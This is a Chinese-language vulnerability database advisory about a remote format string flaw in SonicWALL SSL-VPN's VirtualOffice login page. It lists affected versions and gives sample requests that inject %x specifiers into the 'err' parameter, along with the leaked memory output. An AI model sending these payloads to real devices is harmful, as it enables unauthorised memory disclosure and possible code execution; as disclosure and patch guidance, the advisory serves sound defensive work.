SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’远程格式串漏洞

漏洞起因
输入验证错误

影响系统
SonicWALL SSL-VPN 4000 3.5 4
SonicWALL SSL-VPN 2000 3.5 4
SonicWALL SSL-VPN 200 3.0 8
SonicWALL SSL VPN 200 2.1

不受影响系统
SonicWALL SSL-VPN 4000 3.5 5
SonicWALL SSL-VPN 2000 3.5 5
SonicWALL SSL-VPN 200 3.0 9

危害
远程攻击者可以利用漏洞使应用程序崩溃，并可能执行任意指令。

攻击所需条件
攻击者必须访问SonicWALL SSL-VPN。

漏洞信息
SonicWALL SSL-VPN是一款VPN解决方案。
SonicWALL SSL-VPN设备不正确过滤用户提交的数据，远程攻击者可以利用漏洞进行格式串攻击，导致应用程序崩溃，并可能执行任意指令。
设备使用HTML表单，当验证失败时触发如下错误：
"Login failed – Incorrect name/password"
https://[target]/cgi-bin/welcome/VirtualOffice?err=Login%20failed%20-%20
Incorrect%20name%2Fpassword
通过注入格式串代替输入，会由printf()处理后在HTTP GET应答中返回，如如下GET请求会导致"ABCD0044434241"返回：
https://[target]/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
提交类似如下请求可读取内存信息：
https://[target]/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%
x%x%x%x%x%x%x%x%x%x%x%x%x%x
返回:
"00782578257825782578257825782578257825782578257825782578257825782578257
8257825782578257825782578254007120040304d8cbffff22840221389804b1e0400712
7925000"

测试方法

厂商解决方案
可升级到最新版本：
http://www.sonicwall.com/

漏洞提供者
Patrick Webster

漏洞消息链接
http://www.aushack.com/200905-sonicwall.txt

漏洞消息标题
aushack.com – Vulnerability Advisory

← VMware产品Descheduled Time Accounting Driver拒绝服务漏洞

OpenSSL ‘dtls1_retrieve_buffered_fragment()’ DTLS报文拒绝服务漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’远程格式串漏洞

0 条评论。

发表评论